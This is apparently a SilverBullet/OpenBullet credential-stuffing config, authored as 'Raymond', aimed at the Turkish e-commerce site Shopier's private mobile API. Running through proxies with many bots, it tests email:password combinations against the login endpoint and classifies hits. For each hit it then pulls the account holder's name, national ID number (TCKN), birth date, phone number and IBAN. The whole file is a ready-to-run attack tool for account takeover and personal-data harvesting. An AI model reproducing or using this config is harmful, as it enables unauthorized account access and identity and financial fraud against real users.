[SETTINGS]
{
  "Name": "Shopier_Api",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-30T20:24:45.2908457+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Shopier_Api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://www.shopier.me/apiv3/private/auth.php" 
  CONTENT "email=<USER>&password=<PASS>&deviceBrand=Asus&deviceModel=ASUS_Z01QD&deviceOsVersion=7.1.2&language=0&appVersion=84" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "errorText\":\"login failed" 
  KEYCHAIN Success OR 
    KEY "status\":\"Success" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "header\":\"Ba\\u015fvurunuz inceleniyor" 

PARSE "<SOURCE>" JSON "token" -> VAR "token" 

REQUEST POST "https://www.shopier.me/apiv3/private/getAccountInfo.php" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "token: <token>" 
  HEADER "Host: www.shopier.me" 
  HEADER "Connection: Keep-Alive" 
  HEADER "User-Agent: okhttp/4.7.2" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 0" 

PARSE "<SOURCE>" JSON "memberName" CreateEmpty=FALSE -> CAP "İsim" 

PARSE "<SOURCE>" JSON "memberSurname" CreateEmpty=FALSE -> CAP "Soyisim" 

PARSE "<SOURCE>" JSON "memberTckn" CreateEmpty=FALSE -> CAP "TCKN" 

PARSE "<SOURCE>" JSON "memberBirthDate" -> VAR "memberBirthDate" 

FUNCTION UnixTimeToDate "yyyy-MM-dd" "<memberBirthDate>" -> CAP "Doğum Tarihi" 

PARSE "<SOURCE>" JSON "memberPhone" CreateEmpty=FALSE -> CAP "Telefon" 

PARSE "<SOURCE>" JSON "memberIban" CreateEmpty=FALSE -> CAP "İban" 

